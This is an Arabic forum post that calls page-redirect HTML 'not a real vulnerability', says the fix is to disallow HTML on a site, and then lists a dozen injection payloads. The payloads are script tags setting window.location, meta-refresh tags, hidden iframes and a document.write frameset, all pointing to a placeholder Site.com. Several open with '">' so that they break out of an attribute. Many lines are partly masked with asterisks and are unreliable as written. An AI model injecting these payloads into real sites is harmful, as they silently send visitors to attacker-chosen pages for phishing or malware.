بكل بساطه هذي أكواد تحويل وأعتقد ما هي ثغره .. يعني ترقيعها هو عدم السماح بأكواد الـ HTML بالموقع وتنتهي المشكلة
هذي الأكواد التي تستخدم لتحويل من صفحة لأخرى ..
كود:
<html>">********** location.href="http://Site.com";</script></HTML>
أو
<META ***********="*******" *******="0;URL=http://www.Site.COM/">
أو
">"">>>>**********location="http://www.site.COM"</script>"""">
============================================================
<****** WIDTH=20% HEIGHT=20 SRC="http://www.site.COM">
============================================================
<****** name="I1" width="1" height="1" src="http://www.site.COM">>
============================================================
[color="Yellow"]<****** name="I1" width="1" height="1" get="http://www.site.com">
========================================================
">">><SCRIPTLANGUAGE="JavaScript"> window.location="site.com";</script>"
========================================================
">">><script language="JavaScript"> window.location= "site.com";</script>"
============================== ==========================
<html>">********** location.href="site.com";</script></HTML>
========================================================
<body onfocus=" ********.write('<frameset><frame src=Site.com>')"
================================================================================================================
<META ***********="*******" *******="0; url=Site.com">
========================================================
<META ***********="*******" *******="0; url=Site.com">
========================================================
">">><SCRIPTLANGUAGE="JavaScript">window.location="http://www.Site.COM";</script>" بالتوفيق